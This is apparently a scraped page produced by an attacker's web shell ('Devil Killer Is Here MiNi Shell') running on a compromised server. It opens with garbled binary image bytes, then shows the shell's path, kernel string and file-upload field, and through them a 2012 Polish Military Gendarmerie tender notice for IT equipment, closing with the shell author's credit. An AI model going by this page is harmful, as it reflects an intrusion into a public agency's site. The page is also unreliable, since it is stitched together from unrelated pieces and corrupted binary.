JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/241903-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA SPRZĘTU INFORMATYKI I OPROGRAMOWANIA</b><br>
<b>Numer ogłoszenia: 241903 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej , ul. Jana Ostroroga 35, 01-163 Warszawa, woj. mazowieckie, tel. 22 685 32 47, faks 22 685 30 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU INFORMATYKI I OPROGRAMOWANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA SPRZĘTU INFORMATYKI I OPROGRAMOWANIA
ZADANIE NR 1
1.Switch 8 portów	szt. 10
2.Switch 24 porty 	szt. 1
3.Karta diagnostyczna BIOS PCI/ISA/LPT+USB	szt. 1
4.Adapter USB-IDE 3,5cala, 2,5cala, SATA, ATA dysk	szt. 1
5.Patchcord światłowodowy SC/S.C. (1m.)	szt. 10
6.Zasilacz UPS	szt. 7
7.Router	  szt. 1
8.Fax	  szt. 4
Komplet materiałów eksploatacyjnych	    kpl. 4
9.Uchwyt do monitorów	     szt. 4
10.Tester kabli sieciowych	     szt.	2
11.Przetwornica napięciowa	szt. 20
12.Drukarka do zdjęć	   szt. 2
Komplet materiałów eksploatacyjnych	      kpl. 4
13.Drukarka kart chipowych	szt. 1
14.Dysk twardy wewnętrzny 500GB	szt. 2
15.Pamięć przenośna 2GB	       szt.	15
16.Pamięć przenośna 4GB	       szt.	15
17.Modem USB	     szt. 50
18.Klawiatura	     szt. 2
19.Kensington LOCK	szt. 15
20.Skaner rolkowy 	szt. 3
21.Skaner płaski	     szt.	1
22.Wkrętak akumulatorowy	szt. 2
23.Zaciskarka 8P/6P/4P	      szt.	4
24.Zestaw wkrętaków precyzyjnych	     szt.	5
25.Oprogramowanie Microsoft Office	szt. 6
26.Oprogramowanie do obróbki zdjęć/grafiki	szt. 2
27.Zasilacz ATX	szt. 2
28.Kieszeń na dyski ATA/SATA	szt. 3
29.Listwy zasilające	szt. 22
30.Pamięć do laptopa	szt. 2
31.Multimetr	szt. 1
32.Lutownica  	szt. 1
materiały eksploatacyjne do lutownicy	kpl. 2
33.Przedłużacz USB (2 m.)	szt. 30
34.Nóż krosowniczy	szt. 2

ZADANIE NR 2
1.Kabel UTP kat.6 (305m.)	szt. 3
2.Kabel VGA (D-SUB 15) (20m.)	szt. 1
3.Kabel HDMI (20m.)	szt. 1
4.Kabel typu skrętka kat. 6 ekranowany (305m)	szt. 1
5.Pasta termoprzewodząca	szt. 10
6.Płyta DVD-R 1,4 GB	szt. 800
7.Płyta DVD-RW 1,4 GB	szt. 200
8.Płyta DVD-R 4,7 GB	szt. 400
9.Płyta DVD-RW 4,7 GB	szt. 400
10.Sprężone powietrze	szt. 40
11.Środek do czyszczenia LCD	szt. 20
12.Środek do czyszczenia plastików	szt. 20
13.Płyn kontakt	szt. 5
14.Materiały eksploatacyjne do drukarki etykiet	kpl. 1
15.Śruby do szafy RACK	op/100	4
16.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt.	900
17.Końcówki RJ 11	     szt.	200
18.Końcówki RJ 9	     szt. 	200
19.Końcówki RJ 45	     szt.  1 000

ZADANIE NR 3
1.Dysk sieciowy NAS	szt. 1
2.Ebook reader	szt. 1
3.Urządzenie wielofunkcyjne	szt. 2
Materiały eksploatacyjne	kpl. 1
4.Drukarka laserowa monochromatyczna A4	szt. 3
Komplet materiałów eksploatacyjnych	kpl. 3
5.Drukarka laserowa kolorowa A4	szt. 2
Komplet materiałów eksploatacyjnych	kpl. 2
6.Drukarka do laptopa	        szt.	1
Komplet materiałów eksploatacyjnych   	kpl. 1
7.Tablet	szt. 26.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.60.00-6, 30.23.10.00-7, 30.23.20.00-4, 30.23.40.00-8, 30.23.60.00-2, 30.23.70.00-9, 32.42.00.00-3, 48.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga zabezpieczenia oferty wadium.
2.Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości 3.400,00 zł  dla całości zamówienia, w tym: 
dla zadania nr 1	1.400,00 zł 
dla zadania nr 2	wadium nie jest wymagane
dla zadania nr 3	2.000,00 zł 
3.Wadium może być wniesione w:
3.1.pieniądzu,
3.2.poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3. gwarancjach bankowych,
3.4. gwarancjach ubezpieczeniowych,
3.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
4.Wadium w formie pieniądza należy wnieść przelewem na konto w Banku NBP O/O Warszawa, nr rachunku 98 1010 1010 0135 5013 9120 0000 z dopiskiem na przelewie: Wadium RZP/51/PN/S/2012 O terminie wniesienia wadium, decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
5.Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
5.1.pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
5.2.innej niż pieniądz, oryginał dokumentu został złożony w Oddziale Zabezpieczenia Żandarmerii Wojskowej, Pion Głównego Księgowego, ul. Ostroroga 35, budynek nr 1, pokój nr 244, przed terminem składania ofert.
6.Z treści gwarancji, poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy PZP.
7.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia 
na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i odbiorców, 
oraz załączy dokumenty potwierdzające, że dostawa ta została wykonana lub jest wykonywana należycie, np. referencje. Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż: 
dla zadania nr 1 - 60.000,00 zł
dla zadania nr 2 -   9.000,00 zł
dla zadania nr 3 - 81.000,00 zł</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 150. 000,00 zł w tym: 
dla zadania nr 1 - 60.000,00 zł 
dla zadania nr 2 -   9.000,00 zł
dla zadania nr 3 - 81.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zgodnie z art. 25 ust.1, pkt.2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2010 r., Nr 113, poz. 759, ze zm.), Wykonawca winien przedłożyć oświadczenia lub dokumenty potwierdzające spełnianie zgodności oferowanych dostaw z wymaganiami określonymi przez Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy załączyć niżej wymienione dokumenty, odpowiednio do artykułów według Opisu przedmiotu zamówienia (zał. Nr 1 do SIWZ):
1. Oświadczenie o spełnieniu minimalnych wymaganych parametrów specyfikacji sprzętu.
2. Kartę katalogową oferowanego zasilacza awaryjnego UPS.
3. Oświadczenie lub wydruk o spełnieniu wymogów normy Energy Star 5.0. dla oferowanych komputerów i drukarek
4. Wydruk karty gwarancyjnej podpisanej przez producenta lub dostawcę dla każdego egzemplarza sprzętu
5. Certyfikat ISO 9001:2008 na świadczenie usług serwisowych oraz autoryzacja producenta drukarek dla firmy serwisującej
6. Oświadczenie producenta sprzętu lub jego autoryzowanego przedstawiciela 
w Polsce, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem drukarek.
7. Certyfikat ISO 9001:2008 producenta oferowanych drukarek
8. Certyfikat ISO 140001:2004 producenta oferowanych drukarek</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy w zakresie:
1.terminu zawarcia umowy;
2.zmiany miejsca świadczenia;
3.z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
4.z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze Stron. 
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej
01-163 Warszawa, ul. Ostroroga 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 10:00, miejsce: Oddział Zabezpieczenia Żandarmerii Wojskowej
01-163 Warszawa, ul. Ostroroga 35, kancelaria jawna Zamawiającego - budynek nr 18, pokój nr 126.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt związany z komputerami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 - Sprzęt związany z komputerami
1.Switch 8 portów	szt. 10
2.Switch 24 porty 	szt. 1
3.Karta diagnostyczna BIOS PCI/ISA/LPT+USB	szt. 1
4.Adapter USB-IDE 3,5 cala, 2,5 cala, SATA, ATA dysk	szt. 1
5.Patchcord światłowodowy SC/S.C. (1m.)	szt. 10
6.Zasilacz UPS	szt. 7
7.Router	  szt. 1
8.Fax	  szt. 4
Komplet materiałów eksploatacyjnych	    kpl. 4
9.Uchwyt do monitorów	     szt. 4
10.Tester kabli sieciowych	     szt.	2
11.Przetwornica napięciowa	szt. 20
12.Drukarka do zdjęć	   szt. 2
Komplet materiałów eksploatacyjnych	      kpl. 4
13.Drukarka kart chipowych	szt. 1
14.Dysk twardy wewnętrzny 500GB	szt. 2
15.Pamięć przenośna 2GB	       szt.	15
16.Pamięć przenośna 4GB	       szt.	15
17.Modem USB	     szt. 50
18.Klawiatura	     szt. 2
19.Kensington LOCK	szt. 15
20.Skaner rolkowy 	szt. 3
21.Skaner płaski	     szt.	1
22.Wkrętak akumulatorowy	szt. 2
23.Zaciskarka 8P/6P/4P	      szt.	4
24.Zestaw wkrętaków precyzyjnych	     szt.	5
25.Oprogramowanie Microsoft Office	szt. 6
26.Oprogramowanie do obróbki zdjęć/grafiki	szt. 2
27.Zasilacz ATX	szt. 2
28.Kieszeń na dyski ATA/SATA	szt. 3
29.Listwy zasilające	szt. 22
30.Pamięć do laptopa	szt. 2
31.Multimetr	szt. 1
32.Lutownica  	szt. 1
materiały eksploatacyjne do lutownicy	kpl. 2
33.Przedłużacz USB (2 m.)	szt. 30
34.Nóż krosowniczy	szt. 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.60.00-6, 32.42.00.00-3, 30.23.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Części, akcesoria i wyroby do komputerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - Części, akcesoria i wyroby do komputerów
1.Kabel UTP kat.6 (305m.)	szt. 3
2.Kabel VGA (D-SUB 15) (20m.)	szt. 1
3.Kabel HDMI (20m.)	szt. 1
4.Kabel typu skrętka kat. 6 ekranowany (305m)	szt. 1
5.Pasta termoprzewodząca	szt. 10
6.Płyta DVD-R 1,4 GB	szt. 800
7.Płyta DVD-RW 1,4 GB	szt. 200
8.Płyta DVD-R 4,7 GB	szt. 400
9.Płyta DVD-RW 4,7 GB	szt. 400
10.Sprężone powietrze	szt. 40
11.Środek do czyszczenia LCD	szt. 20
12.Środek do czyszczenia plastików	szt. 20
13.Płyn kontakt	szt. 5
14.Materiały eksploatacyjne do drukarki etykiet	kpl. 1
15.Śruby do szafy RACK	op/100	4
16.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt.	900
17.Końcówki RJ 11	     szt.	200
18.Końcówki RJ 9	     szt. 	200
19.Końcówki RJ 45	     szt.  1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt peryferyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 Sprzęt peryferyjny
1.Dysk sieciowy NAS	szt. 1
2.Ebook reader	szt. 1
3.Urządzenie wielofunkcyjne	szt. 2
Materiały eksploatacyjne	kpl. 1
4.Drukarka laserowa monochromatyczna A4	szt. 3
Komplet materiałów eksploatacyjnych	kpl. 3
5.Drukarka laserowa kolorowa A4	szt. 2
Komplet materiałów eksploatacyjnych	kpl. 2
6.Drukarka do laptopa     szt. 1
Komplet materiałów eksploatacyjnych   kpl. 1
7.Tablet	szt. 26.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com